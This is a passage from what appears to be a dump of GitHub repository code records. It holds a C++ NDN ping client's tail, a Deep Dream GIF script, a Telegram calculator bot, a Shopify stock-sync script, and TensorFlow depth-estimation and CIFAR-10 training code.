\"\\n\";\n std::cout << options;\n exit(2);\n}\n\nint\nmain(int argc, char* argv[])\n{\n Options options;\n options.shouldAllowStaleData = false;\n options.nPings = -1;\n options.interval = time::milliseconds(getDefaultPingInterval());\n options.timeout = time::milliseconds(getDefaultPingTimeoutThreshold());\n options.startSeq = 0;\n options.shouldGenerateRandomSeq = true;\n options.shouldPrintTimestamp = false;\n\n std::string identifier;\n\n namespace po = boost::program_options;\n\n po::options_description visibleOptDesc(\"Allowed options\");\n visibleOptDesc.add_options()\n (\"help,h\", \"print this message and exit\")\n (\"version,V\", \"display version and exit\")\n (\"interval,i\", po::value<int>(),\n (\"set ping interval in milliseconds (default \" +\n std::to_string(getDefaultPingInterval().count()) + \" ms - minimum \" +\n std::to_string(getMinimumPingInterval().count()) + \" ms)\").c_str())\n (\"timeout,o\", po::value<int>(),\n (\"set ping timeout in milliseconds (default \" +\n std::to_string(getDefaultPingTimeoutThreshold().count()) + \" ms)\").c_str())\n (\"count,c\", po::value<int>(&options.nPings), \"set total number of pings\")\n (\"start,n\", po::value<uint64_t>(&options.startSeq),\n \"set the starting seq number, the number is incremented by 1 after each Interest\")\n (\"identifier,p\", po::value<std::string>(&identifier),\n \"add identifier to the Interest names before the numbers to avoid conflict\")\n (\"cache,a\", \"allows routers to return stale Data from cache\")\n (\"timestamp,t\", \"print timestamp with messages\")\n ;\n po::options_description hiddenOptDesc(\"Hidden options\");\n hiddenOptDesc.add_options()\n (\"prefix\", po::value<std::string>(), \"prefix to send pings to\")\n ;\n\n po::options_description optDesc(\"Allowed options\");\n optDesc.add(visibleOptDesc).add(hiddenOptDesc);\n\n try {\n po::positional_options_description optPos;\n optPos.add(\"prefix\", -1);\n\n po::variables_map optVm;\n po::store(po::command_line_parser(argc, argv).options(optDesc).positional(optPos).run(), optVm);\n po::notify(optVm);\n\n if (optVm.count(\"help\") > 0) {\n usage(visibleOptDesc);\n }\n\n if (optVm.count(\"version\") > 0) {\n //std::cout << \"ndnping \" << tools::VERSION << std::endl;\n exit(0);\n }\n\n if (optVm.count(\"prefix\") > 0) {\n options.prefix = Name(optVm[\"prefix\"].as<std::string>());\n }\n else {\n std::cerr << \"ERROR: No prefix specified\" << std::endl;\n usage(visibleOptDesc);\n }\n\n if (optVm.count(\"interval\") > 0) {\n options.interval = time::milliseconds(optVm[\"interval\"].as<int>());\n\n if (options.interval.count() < getMinimumPingInterval().count()) {\n std::cerr << \"ERROR: Specified ping interval is less than the minimum \" <<\n getMinimumPingInterval() << std::endl;\n usage(visibleOptDesc);\n }\n }\n\n if (optVm.count(\"timeout\") > 0) {\n options.timeout = time::milliseconds(optVm[\"timeout\"].as<int>());\n }\n\n if (optVm.count(\"count\") > 0) {\n if (options.nPings <= 0) {\n std::cerr << \"ERROR: Number of ping must be positive\" << std::endl;\n usage(visibleOptDesc);\n }\n }\n\n if (optVm.count(\"start\") > 0) {\n options.shouldGenerateRandomSeq = false;\n }\n\n if (optVm.count(\"identifier\") > 0) {\n bool isIdentifierAcceptable = std::all_of(identifier.begin(), identifier.end(), &isalnum);\n if (identifier.empty() || !isIdentifierAcceptable) {\n std::cerr << \"ERROR: Unacceptable client identifier\" << std::endl;\n usage(visibleOptDesc);\n }\n\n options.clientIdentifier = name::Component(identifier);\n }\n\n if (optVm.count(\"cache\") > 0) {\n options.shouldAllowStaleData = true;\n }\n\n if (optVm.count(\"timestamp\") > 0) {\n options.shouldPrintTimestamp = true;\n }\n }\n catch (const po::error& e) {\n std::cerr << \"ERROR: \" << e.what() << std::endl;\n usage(visibleOptDesc);\n }\n\n std::cout << \"PING \" << options.prefix << std::endl;\n return Runner(options).run();\n}\n\n} // namespace client\n} // namespace ping\n} // namespace ndn\n\nint\nmain(int argc, char** argv)\n{\n return ndn::ping::client::main(argc, argv);\n}\n" } ]
8
orelyehuda/dreamer
https://github.com/orelyehuda/dreamer
3c525417e39f88d130e2d9681f0562c7a7ca2261
51dc57d1121804f2e0e8b05c2bbe5b38045fc639
d54a5ad4b215b13a14aa89f45985d05ddc93c6e6
refs/heads/main
2023-08-11T19:31:44.483110
2021-09-19T07:32:01
2021-09-19T07:32:01
324,271,470
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6991869807243347, "alphanum_fraction": 0.707317054271698, "avg_line_length": 16.285715103149414, "blob_id": "2e208284e26e4c8ee51f7eae448354b560428d92", "content_id": "b324aa3b0b7bb090dbdc6205d5cdea0d7093b8c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 123, "license_type": "no_license", "max_line_length": 77, "num_lines": 7, "path": "/README.md", "repo_name": "orelyehuda/dreamer", "src_encoding": "UTF-8", "text": "\n(Deep Dream GIF)\nUtilized Google's deep-dream model to output a GIF translation of the output.\n\n\n<DEMO:>\n\n![](demo1.gif)\n\n" }, { "alpha_fraction": 0.6418468952178955, "alphanum_fraction": 0.6578618884086609, "avg_line_length": 24.705883026123047, "blob_id": "96848c6bc82602098d36cf8e0056128b3acc246a", "content_id": "a4ff1dc5876cfa0c3c80b3b909880ab25e6ae24b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4808, "license_type": "no_license", "max_line_length": 116, "num_lines": 187, "path": "/dreamer.py", "repo_name": "orelyehuda/dreamer", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[91]:\n\n\nimport tensorflow as tf\n\n\n# In[137]:\n\n\nimport numpy as np \n\nimport os\n\nimport matplotlib as mpl\n\nimport IPython.display as display\nimport PIL.Image\n\nfrom tensorflow.keras.preprocessing import image\n\nimport glob\n\nimport random\n\npath = \"imgs/img1.jpg\"\n\n\ndef open_image(path, max_dim=None):\n img = PIL.Image.open(path)\n if max_dim:\n img.thumbnail((max_dim, max_dim))\n return np.array(img)\n\n\n\n# Download an image and read it into a NumPy array.\ndef download(url, max_dim=None):\n name = url.split('/')[-1]\n image_path = tf.keras.utils.get_file(name, origin=url)\n img = PIL.Image.open(image_path)\n if max_dim:\n img.thumbnail((max_dim, max_dim))\n return np.array(img)\n\n\n# Normalize an image\ndef deprocess(img):\n img = 255*(img + 1.0)/2.0\n return tf.cast(img, tf.uint8)\n\n#Save an image\ndef save_image(image, filename):\n # Ensure the pixel-values are between 0 and 255.\n image = np.clip(image, 0.0, 255.0)\n \n # Convert to bytes.\n image = image.astype(np.uint8)\n \n with open(filename, 'wb') as file:\n PIL.Image.fromarray(image).save(filename, 'png')\n \n \n \n# Display an image\ndef show(img):\n display.display(PIL.Image.fromarray(np.array(img)))\n\n\n#original_img = download(url, max_dim=850)\noriginal_img = open_image(path, max_dim=None)\n\nbase_model = tf.keras.applications.InceptionV3(include_top=False, weights='imagenet')\n\n\n# Maximize the activations of these layers\nnames = ['mixed8']\nlayers = [base_model.get_layer(name).output for name in names]\n\n# Create the feature extraction model\ndream_model = tf.keras.Model(inputs=base_model.input, outputs=layers)\n\n\n# ## Calculate loss\n\ndef calc_loss(img, model):\n # Pass forward the image through the model to retrieve the activations.\n # Converts the image into a batch of size 1.\n img_batch = tf.expand_dims(img, axis=0)\n layer_activations = model(img_batch)\n if len(layer_activations) == 1:\n layer_activations = [layer_activations]\n\n losses = []\n for act in layer_activations:\n loss = tf.math.reduce_mean(act)\n losses.append(loss)\n\n return tf.reduce_sum(losses)\n\n\n# ## Gradient ascent\n\nclass DeepDream(tf.Module):\n def __init__(self, model):\n self.model = model\n\n @tf.function(\n input_signature=(\n tf.TensorSpec(shape=[None,None,3], dtype=tf.float32),\n tf.TensorSpec(shape=[], dtype=tf.int32),\n tf.TensorSpec(shape=[], dtype=tf.float32),)\n )\n def __call__(self, img, steps, step_size):\n print(\"Tracing\")\n loss = tf.constant(0.0)\n for n in tf.range(steps):\n with tf.GradientTape() as tape:\n # This needs gradients relative to `img`\n # `GradientTape` only watches `tf.Variable`s by default\n tape.watch(img)\n loss = calc_loss(img, self.model)\n\n # Calculate the gradient of the loss with respect to the pixels of the input image.\n gradients = tape.gradient(loss, img)\n\n # Normalize the gradients.\n gradients /= tf.math.reduce_std(gradients) + 1e-8 \n \n # In gradient ascent, the \"loss\" is maximized so that the input image increasingly \"excites\" the layers.\n # You can update the image by directly adding the gradients (because they're the same shape!)\n img = img + gradients*step_size\n img = tf.clip_by_value(img, -1, 1)\n \n\n return loss, img\n\ndeepdream = DeepDream(dream_model)\n\n# ## Main Loop\n\ndef run_deep_dream_simple(img, steps=150, step_size=0.01, num_frames = 10):\n # Convert from uint8 to the range expected by the model.\n img = tf.keras.applications.inception_v3.preprocess_input(img)\n img = tf.convert_to_tensor(img)\n step_size = tf.convert_to_tensor(step_size)\n steps_remaining = steps\n step = 0\n rand_name = str(random.randint(0,999))\n outputname = \"\\\\Users\\Le Orel\\deepdream\\\\\" + rand_name\n os.mkdir(outputname)\n print(outputname)\n \n while steps_remaining:\n if steps_remaining>100:\n run_steps = tf.constant(100)\n else:\n run_steps = tf.constant(steps_remaining)\n steps_remaining -= run_steps\n step += run_steps\n frames = []\n for k in range(num_frames):\n loss, img = deepdream(img, run_steps, tf.constant(step_size))\n result = deprocess(img)\n \n save_image(result, outputname+ \"\\\\\"+str(k)+ \".png\")\n frames.append(result)\n \n display.clear_output(wait=True)\n print (\"Step {}, loss {}\".format(step, loss))\n\n\n display.clear_output(wait=True)\n show(result)\n\n return result,rand_name\n\n\nnum_frames_calc = 50\ndream_img, filepath = run_deep_dream_simple(img=original_img, steps=3, step_size=0.01, num_frames = num_frames_calc)\n\n\n#Save the frames as a gif\nmake_movie = \"ffmpeg -r \" + str(num_frames_calc) + \" -i \" + filepath + \"\\\\%01d.png -y \" + filepath+ \"\\\\vid.gif\"\nos.system(make_movie)\n\n" } ]
2
tdakkota/chat_calculating_bot
https://github.com/tdakkota/chat_calculating_bot
d05cfb889320153fd9d43cba775eb9a36fa42326
c60332a353ce956b35e3aaae96c3a2524b5733fe
066dbb38a2512e759bff3498fb9bf74f0ca77eb8
refs/heads/master
2021-05-25T12:16:12.424461
2020-04-07T08:19:53
2020-04-07T08:19:53
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6319514513015747, "alphanum_fraction": 0.6380181908607483, "avg_line_length": 20.9777774810791, "blob_id": "fbceea70393620645de3d151e50b05f75df29c14", "content_id": "ef791cf71cc4e1359974febbaf691d995a7467ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1015, "license_type": "no_license", "max_line_length": 117, "num_lines": 45, "path": "/bot/main.py", "repo_name": "tdakkota/chat_calculating_bot", "src_encoding": "UTF-8", "text": "import decimal\nimport operator\n\nimport telebot\n\nfrom constants import TOKEN\n\nbot = telebot.TeleBot(TOKEN)\n\nOPERATION_MAP = {\n 'плюс': operator.add,\n '+': operator.add,\n 'минус': operator.sub,\n '-': operator.sub,\n 'разделить': operator.truediv,\n '/': operator.truediv,\n 'умножить': operator.mul,\n '*': operator.mul,\n}\n\n\[email protected]_handler()\ndef listen_all_messages(message):\n # bot can work with messages from 3 part\n if len(str(message.text).split()) != 3:\n return\n\n one, two, three = (x.strip() for x in str(message.text).split())\n if two not in OPERATION_MAP:\n return\n\n try:\n one, three = float(one), float(three)\n except ValueError:\n return\n\n try:\n result = decimal.Decimal(OPERATION_MAP[two](one, three)).quantize(decimal.Decimal('.01'), decimal.ROUND_05UP)\n except (ZeroDivisionError, decimal.InvalidOperation):\n return\n\n bot.reply_to(message, f'= {result}')\n\n\nbot.polling(none_stop=True)\n" } ]
1
samsale/shopify-stock-update
https://github.com/samsale/shopify-stock-update
d8394f9d779096031ec9a1f5740758815078121a
b62d42fd887c92ed33af4d4ba51970c8063560f2
d4fdc6b1f5b6a3e1b6c5cc0ba997c52041dc6651
refs/heads/master
2020-04-14T03:29:16.314277
2018-12-30T18:40:32
2018-12-30T18:40:32
163,609,349
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5834966897964478, "alphanum_fraction": 0.590356707572937, "avg_line_length": 30.300613403320312, "blob_id": "02f925be95b5cf5911285ea93d8a252c013fef5f", "content_id": "4956684817a68f780f509a0a3eef6844c8b1c9a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5102, "license_type": "no_license", "max_line_length": 119, "num_lines": 163, "path": "/stock_update.py", "repo_name": "samsale/shopify-stock-update", "src_encoding": "UTF-8", "text": "import email\nimport imaplib\nimport os\nimport csv\nimport json\nimport requests\nimport math\nimport os\nimport time\n\napi_key = ''\npassword = ''\n\nusername = '[email protected]'\npw = ''\nsave_path = '/'\n\n\ndef connect_to_gmail():\n mail = imaplib.IMAP4_SSL('imap.gmail.com')\n mail.login(username, pw)\n print(\"Script Log - Connected to Gmail\")\n return mail\n\n\ndef download_csv(inbox):\n inbox.select(\"StockUpdates\")\n results, data = inbox.uid('search', None, \"ALL\")\n inbox_list = data[0].split()\n email_id = inbox_list[-1]\n newest_result, email_data = inbox.uid('fetch', email_id, '(RFC822)')\n raw_email = email_data[0][1].decode(\"utf-8\")\n email_message = email.message_from_string(raw_email)\n for part in email_message.walk():\n if part.get_content_maintype() == 'multipart':\n continue\n filename = part.get_filename()\n if filename == 'europa stock report.csv':\n with open(os.path.join('/tmp/', filename), 'wb') as fp:\n print(\"Script Log Downloaded csv\",fp)\n fp.write(part.get_payload(decode=True))\n\n\ndef get_file():\n # f = input('What is the file name?')\n # f_ext = f+'.csv'\n file_name = '/tmp/europa stock report.csv'\n return file_name\n\n\ndef get_number_of_pages():\n url = 'https://rubysgardenboutique.myshopify.com/admin/products/count.json'\n r = requests.get(url, auth=(api_key, password))\n json_data = r.json()\n t = int(json_data['count'])\n print (\"Script Log - Number of Products \",t)\n pages = math.ceil(t / 250.0)\n print (\"Script Log - Got number of pages\")\n return pages\n\n\ndef get_all_products(pages):\n d = []\n i = 1\n while i <= pages:\n url = 'https://rubysgardenboutique.myshopify.com/admin/variants.json?limit=250&page={}&fields=id,sku'.format(i)\n r = requests.get(url, auth=(api_key, password))\n json_data = r.json()\n d += json_data['variants']\n i = i + 1\n print (\"Script Log - Got products\")\n return d\n\n\ndef create_sku_to_id_mapping(website_data):\n sku_to_id_map = {}\n for web_item in website_data: # For each 'variant' on your shopify\n sku = web_item['sku'] # Get the sku\n sku_to_id_map[sku] = web_item['id'] # Add the item to the dictionary, with the sku as the key!\n return sku_to_id_map\n\n\n\ndef select_supplier(file_name):\n if clientId == 'cb':\n output = csv_cb(file_name)\n elif clientId == 'el':\n output = csv_el(file_name)\n elif clientId == 'wgf':\n output = csv_wgf(file_name)\n elif clientId == 'west':\n output = csv_west(file_name)\n return (output)\n\ndef csv_el(file_name):\n output = []\n hide = []\n not_in_store = []\n sku_col = 1\n quantity_col = 3\n finished_col = 5\n skips = 3\n stock = ['GOOD', 'LOW']\n # file_path = '/Users/SamSale/Desktop/csv_drop/{}'.format(file_name)\n with open(file_name) as f:\n for skip in range(skips):\n next(f)\n for csv_item in csv.reader(f): # For each item in the CSV\n if csv_item[quantity_col] in stock:\n converted_inv = 69\n elif csv_item[quantity_col] == 'OUT':\n converted_inv = 0\n sku_in_csv = csv_item[sku_col]\n if sku_in_csv in website_dict:\n id = website_dict[sku_in_csv] # Use the sku as the key to get our web item from the dictionary\n output.append({\"variant\":\n {'id': id, \"inventory_quantity\": converted_inv,\n 'inventory_management': 'shopify'}})\n if csv_item[quantity_col] == 'OUT' and csv_item[finished_col] == 'FINISHED':\n hide.append\n print('DEBUG: SKU {} is now deleted from store. Status: finished'.format(csv_item[sku_col]))\n else:\n not_in_store.append(sku_in_csv)\n print (\"Script Log - Created LUT\")\n return output\n f.close(file_name)\n\n\ndef update_stock(output):\n count = 0\n for item in output:\n id = (item['variant']['id'])\n payload = json.dumps(item)\n url = 'https://rubysgardenboutique.myshopify.com/admin/variants/{}.json'.format(id)\n r = requests.put(url, data=payload, auth=(api_key, password), headers={\"Content-Type\": \"application/json\"})\n count += 1\n time.sleep(.100)\n if r.status_code != 200:\n print ('error! with', item['variant']['id'], r.status_code)\n get_sku = requests.get(url, auth=(api_key, password))\n sku_list = get_sku.json()\n skus = sku_list['variant']['sku']\n qty = sku_list['variant']['inventory_quantity']\n\n print (count, \"Items in total\")\n\n\ndef delete_source_csv(file_name):\n os.remove(file_name)\n fn = file_name.rsplit('/', 1)[-1]\n print (fn, 'was deleted.')\n\n\ninbox = connect_to_gmail()\nnewest_mail = download_csv(inbox)\nfile_name = get_file()\nclientId = 'el'\npages = get_number_of_pages()\nwebsite_data = get_all_products(pages)\nwebsite_dict = create_sku_to_id_mapping(website_data)\noutput = select_supplier(file_name)\nupdate_stock(output)\ndelete_source_csv(file_name)\n" } ]
1
sjwhhhi/tensorflow
https://github.com/sjwhhhi/tensorflow
f6c66ce1a49554d15b5d7869dd4cd68f82aaeffe
1123d36424270df139e077319ec812ce775ebf32
bd411dbbc6d883ed890d6fc96eed30030d4b9ee6
refs/heads/master
2020-03-21T17:25:53.700381
2018-08-07T01:29:24
2018-08-07T01:29:24
138,831,421
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5492666959762573, "alphanum_fraction": 0.5684775710105896, "avg_line_length": 34.59558868408203, "blob_id": "967cda56b349cdcbe27bf7eb7b2a678f09b0685d", "content_id": "81199c30165f37b093b09e64974a7f0dfdcd2ad9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4841, "license_type": "no_license", "max_line_length": 99, "num_lines": 136, "path": "/depth_train/train.py", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nimport models\nfrom data_process import BatchGenerator\nfrom PIL import Image\nimport numpy as np\n\nCSV_PATH = 'train_web.csv'\nRESTORE_MODEL = 'nyu_model/model.ckpt'\nSAVE_MODEL = 'train/model.ckpt'\nRESULT_DIR = 'result/'\nINITIAL_LR = 0.0001\nbatch_size = 8\nMAX_STEP = 500000\n\n\ndef berHuLoss(label, predict, invalid_depth):\n output_size = 128*160\n predict_all = tf.reshape(predict, [-1, output_size])\n depth_all = tf.reshape(label, [-1, output_size])\n pixel_mask = tf.reshape(invalid_depth, [-1, output_size])\n predict_valid = tf.multiply(predict_all, pixel_mask)\n label_valid = tf.multiply(depth_all, pixel_mask)\n abs_error = tf.abs(label_valid - predict_valid)\n c = 0.2 * tf.reduce_max(abs_error)\n berhuloss = tf.where(abs_error <= c,\n abs_error,\n (tf.square(abs_error) + tf.square(c))/(2*c))\n loss = tf.reduce_mean(berhuloss)\n tf.summary.scalar('berhu_loss', loss)\n return loss\n\ndef build_loss(scale2_op, depths, pixels_mask):\n output_size = 128*160\n predictions_all = tf.reshape(scale2_op, [-1, output_size])\n depths_all = tf.reshape(depths, [-1, output_size])\n pixels_mask = tf.reshape(pixels_mask, [-1, output_size])\n predictions_valid = tf.multiply(predictions_all, pixels_mask)\n target_valid = tf.multiply(depths_all, pixels_mask)\n d = tf.subtract(predictions_valid, target_valid)\n square_d = tf.square(d)\n sum_square_d = tf.reduce_sum(square_d, 1)\n sum_d = tf.reduce_sum(d, 1)\n sqare_sum_d = tf.square(sum_d)\n cost = tf.reduce_mean((sum_square_d / output_size) - 0.5 * (sqare_sum_d / pow(output_size,2) ))\n cost = tf.sqrt(cost)\n tf.summary.scalar('loss', cost)\n return cost\n\ndef learning_rate(global_step):\n lr = tf.train.exponential_decay(INITIAL_LR,\n global_step,\n 2000,\n 0.9,\n True)\n tf.summary.scalar('learning_rate', lr)\n return lr\n\ndef train():\n # load data\n batch_generator = BatchGenerator(batch_size=batch_size)\n image, depth, invalid_depth = batch_generator.csv_input(CSV_PATH)\n\n # network\n net = models.ResNet50UpProj({'data': image}, batch_size, 1, True)\n logits = net.get_output()\n\n # loss\n #loss = berHuLoss(depth, logits, invalid_depth)\n loss = build_loss(logits, depth, invalid_depth)\n\n # fine_tuning\n varlist_train = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)\n varlist_all = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)\n\n # learning_rate\n global_step = tf.train.get_or_create_global_step()\n lr = learning_rate(global_step)\n\n # opt\n optimizer = tf.train.AdamOptimizer(lr)\n opt = optimizer.minimize(loss, global_step=global_step, var_list=varlist_train[-98:])\n\n merged = tf.summary.merge_all()\n writer = tf.summary.FileWriter('logdir')\n init = tf.global_variables_initializer()\n\n with tf.Session() as sess:\n sess.run(init)\n # Load the converted parameters\n print('Loading the model')\n saver = tf.train.Saver(var_list=varlist_all)\n saver.restore(sess, RESTORE_MODEL)\n\n #train\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess, coord)\n for i in range(MAX_STEP):\n i = sess.run([global_step])[0]\n _, l = sess.run([opt, loss])\n print('step = %d, loss = %f' % (i, l))\n if i % 10 == 0 and i != 0:\n summary = sess.run(merged)\n writer.add_summary(summary, i)\n if i % 200 == 0 and i != 0:\n _, l, output, gt, rgb = sess.run([opt, loss, logits, depth, image])\n saver.save(sess, SAVE_MODEL)\n\n #rgb\n img = Image.fromarray(np.uint8(rgb[0]))\n img.save(RESULT_DIR+str(i)+'rgb.png')\n #prediction\n dep = output[0].transpose(2, 0, 1)\n if np.max(dep) != 0:\n ra_depth = (dep / np.max(dep)) * 255.0\n else:\n ra_depth = dep * 255.0\n depth_pil = Image.fromarray(np.uint8(ra_depth[0]), mode=\"L\")\n depth_pil.save(RESULT_DIR+str(i)+'pred.png')\n #groundtruth\n ground = gt[0].transpose(2, 0, 1)\n if np.max(ground) != 0:\n ra_ground = (ground / np.max(ground)) * 255.0\n else:\n ra_ground = ground * 255.0\n depth_pil = Image.fromarray(np.uint8(ra_ground[0]), mode=\"L\")\n depth_pil.save(RESULT_DIR+str(i)+'gt.png')\n\n coord.request_stop()\n coord.join(threads)\n sess.close()\n\ndef main(argv=None):\n train()\n\nif __name__ == '__main__':\n tf.app.run()\n" }, { "alpha_fraction": 0.5893254280090332, "alphanum_fraction": 0.6085989475250244, "avg_line_length": 35.486488342285156, "blob_id": "82c6e92bbb6ff3e33e8b29661d550fd13a3ebdda", "content_id": "334fb8fee6ca3b23b5ce566b61a8095e691e78e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1349, "license_type": "no_license", "max_line_length": 95, "num_lines": 37, "path": "/depth_train/data_process.py", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "import tensorflow as tf\n\nINPUT_HEIGHT = 228\nINPUT_WIDTH = 304\nOUTPUT_HEIGHT = 128\nOUTPUT_WIDTH = 160\n\nclass BatchGenerator:\n def __init__(self, batch_size):\n self.batch_size = batch_size\n\n def csv_input(self, csv_file):\n filename_queue = tf.train.string_input_producer([csv_file], shuffle=True)\n reader = tf.TextLineReader()\n _, data_example = reader.read(filename_queue)\n image_examples, depth_targets = tf.decode_csv(data_example, [[\"path\"], [\"annotation\"]])\n #input\n jpg = tf.read_file(image_examples)\n image = tf.image.decode_jpeg(jpg, channels=3)\n image = tf.cast(image, tf.float32)\n #target\n png = tf.read_file(depth_targets)\n depth = tf.image.decode_png(png, channels=1)\n depth = tf.cast(depth, tf.float32)\n depth = tf.div(depth, [255.0])\n #resize\n image = tf.image.resize_images(image, (INPUT_HEIGHT, INPUT_WIDTH))\n depth = tf.image.resize_images(depth, (OUTPUT_HEIGHT, OUTPUT_WIDTH))\n #invalid depth\n invalid_depth = tf.sign(depth)\n images, depths, invalid_depths = tf.train.batch(\n [image, depth, invalid_depth],\n batch_size=self.batch_size,\n num_threads=4,\n capacity=50 + 3 * self.batch_size,\n )\n return images, depths, invalid_depths" }, { "alpha_fraction": 0.5544260740280151, "alphanum_fraction": 0.5836510062217712, "avg_line_length": 29.675325393676758, "blob_id": "81a6e7b96ea503855436135c7b24ff7eed058a92", "content_id": "0b66f92e92646ec9fbd5ed8f8fd08591ce336cbc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2361, "license_type": "no_license", "max_line_length": 97, "num_lines": 77, "path": "/depth_train/evaluate.py", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "import os, glob, cv2\nimport numpy as np\nimport tensorflow as tf\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\n\nimport models\n\ndef load_data(image_dir, image_shape, out_shape):\n fs = glob.glob(os.path.join(image_dir, '*.jpg'))\n x = np.zeros((len(fs),) + image_shape, dtype=np.float32)\n y = np.zeros((len(fs),) + out_shape, dtype=np.float32)\n for i in range(len(fs)):\n img = cv2.imread(fs[i])[:,:,::-1]\n img = img[12:-12,16:-16,:]\n img = cv2.resize(img, (image_shape[1], image_shape[0]))\n img = img.astype('float32')\n x[i] = img\n img = cv2.imread(fs[i][:-3]+'png')\n img = img[12:-12, 16:-16, 0]\n img = cv2.resize(img, (out_shape[1], out_shape[0]))\n img = img.astype('float32')\n y[i,:,:,0] = 0.01*img\n return x, y\n\ndef evaluate(model_data_path, image_path):\n # Default input size\n height = 240\n width = 320\n channels = 3\n output_height, output_width = height, width\n for i in range(5):\n output_height = np.ceil(output_height / 2)\n output_width = np.ceil(output_width / 2)\n output_height = int(16*output_height)\n output_width = int(16*output_width)\n\n # Create a placeholder for the input image\n input_node = tf.placeholder(tf.float32, shape=(None, height, width, channels))\n\n # Construct the network\n net = models.ResNet50UpProj({'data': input_node}, 1, 1, False)\n\n with tf.Session() as sess:\n # Load the converted parameters\n print('Loading the model')\n\n # Use to load from ckpt file\n saver = tf.train.Saver()\n saver.restore(sess, model_data_path)\n\n x, y = load_data(image_path, (height, width, channels), (output_height, output_width, 1))\n ypred = np.zeros(y.shape)\n\n rel = 0\n total_batch = x.shape[0]\n for i in range(total_batch):\n pred = sess.run(net.get_output(), feed_dict={input_node: x[i: (i + 1)]})\n ypred[i] = pred\n\n # Evalute the network\n rel = abs(y-ypred) / y\n rel = np.mean(rel)\n thresh = np.maximum((y/ypred), (ypred/y))\n acc = (thresh<1.25).mean()\n\n return rel, acc\n\ndef main():\n model_path = './NYU_FCRN_ckpt/model.ckpt'\n image_path = '../data'\n rel, acc = evaluate(model_path, image_path)\n print('rel: {0}, acc: {1}'.format(rel, acc))\n\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.6567817330360413, "alphanum_fraction": 0.6747691035270691, "avg_line_length": 42.75531768798828, "blob_id": "3480d45249bc16d075dd09211896140915bd1bdf", "content_id": "64d9313bf563118977abf7bac7eea69f61cf3590", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4114, "license_type": "no_license", "max_line_length": 128, "num_lines": 94, "path": "/cifar10_Alexnet/cifar10_input.py", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "import os\nimport tensorflow as tf\n\nimage_size = 24\nnum_class = 10\nnum_example_per_epoch_for_train = 50000\nnum_example_per_epoch_for_eval = 10000\n\ndef read_cifar10(filename_queue):\n class CIFAR10Record(object):\n pass\n result = CIFAR10Record()\n label_bytes = 1\n result.height = 32\n result.width = 32\n result.depth = 3\n image_bytes = result.height * result.width *result.depth\n record_bytes = label_bytes + image_bytes\n #reader\n reader = tf.FixedLengthRecordReader(record_bytes= record_bytes)\n result.key, value = reader.read(filename_queue)\n #convert string to uint8\n record_bytes = tf.decode_raw(value, tf.uint8)\n #first bytes represent the label, in int32\n result.label = tf.cast(tf.strided_slice(record_bytes, [0], [label_bytes]), tf.int32)\n #remaining bytes represent the image, from [depth*height*width] to [depth,height,width]\n depth_major = tf.reshape(\n tf.strided_slice(record_bytes, [label_bytes], [label_bytes + image_bytes]), [result.depth, result.height, result.width])\n #from [depth, height, width] to [height, width, depth]\n result.uint8image = tf.transpose(depth_major, [1, 2, 0])\n return result\n\ndef _generate_image_label_batch(image, label, min_queue_examples, batch_size, shuffle):\n num_preprocess_threads = 16\n if shuffle:\n images, label_batch = tf.train.shuffle_batch(\n [image, label],\n batch_size = batch_size,\n num_threads = num_preprocess_threads,\n capacity = min_queue_examples + 3 * batch_size,\n min_after_dequeue = min_queue_examples)\n else:\n images, label_batch = tf.train.batch(\n [image, label],\n batch_size=batch_size,\n num_threads=num_preprocess_threads,\n capacity=min_queue_examples + 3 * batch_size)\n\n return images, tf.reshape(label_batch, [batch_size])\n\ndef distorted_input(data_dir, batch_size):\n filenames = [os.path.join(data_dir, 'data_batch_%d.bin' %i)\n for i in range (1, 6)]\n filename_queue = tf.train.string_input_producer(filenames)\n read_input = read_cifar10(filename_queue)\n reshaped_image = tf.cast(read_input.uint8image, tf.float32)\n height = image_size\n width = image_size\n #preprocess for trainging\n #get [24,24] part in image\n distorted_image = tf.random_crop(reshaped_image, [height, width, 3])\n distorted_image = tf.image.random_flip_left_right(distorted_image)\n distorted_image = tf.image.random_brightness(distorted_image,max_delta = 63)\n distorted_image = tf.image.random_contrast(distorted_image, lower = 0.2, upper = 1.8)\n float_image = tf.image.per_image_standardization(distorted_image)\n #set shape for dataset\n float_image.set_shape([height, width, 3])\n read_input.label.set_shape([1])\n min_fraction_queue = 0.4\n min_queue_examples = int(num_example_per_epoch_for_train * min_fraction_queue)\n\n return _generate_image_label_batch(float_image, read_input.label, min_queue_examples, batch_size, shuffle = True)\n\ndef inputs(eval_data, data_dir, batch_size):\n if not eval_data:\n filenames = [os.path.join(data_dir, 'data_batch_%d.bin' %i)\n for i in range(1, 6)]\n num_example_per_epoch = num_example_per_epoch_for_train\n else:\n filenames = [os.path.join(data_dir, 'test_batch.bin')]\n num_example_per_epoch = num_example_per_epoch_for_eval\n\n filenames_queue = tf.train.string_input_producer(filenames)\n read_input = read_cifar10(filenames_queue)\n reshaped_image = tf.cast(read_input.uint8image, tf.float32)\n height = image_size\n width = image_size\n reshaped_image = tf.image.resize_image_with_crop_or_pad(reshaped_image, height, width)\n 